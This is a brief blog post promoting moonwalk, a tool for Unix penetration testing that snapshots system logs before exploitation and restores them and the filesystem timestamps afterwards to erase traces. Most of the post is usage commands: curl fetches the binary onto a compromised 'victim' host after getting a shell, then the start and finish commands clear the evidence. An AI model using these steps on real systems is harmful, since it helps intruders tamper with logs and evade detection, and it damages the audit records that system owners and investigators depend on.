moonwalk
- Thiru T
- Nov 9, 2024
- 1 min read
moonwalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.
It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.
Install:
curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalkUsage:
# Start moonwalk straight after getting a shell on the victim Linux endpoint
curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
chmod +x moonwalk
moonwalk start
# Once you are finished, clear your traces
moonwalk finish
Comments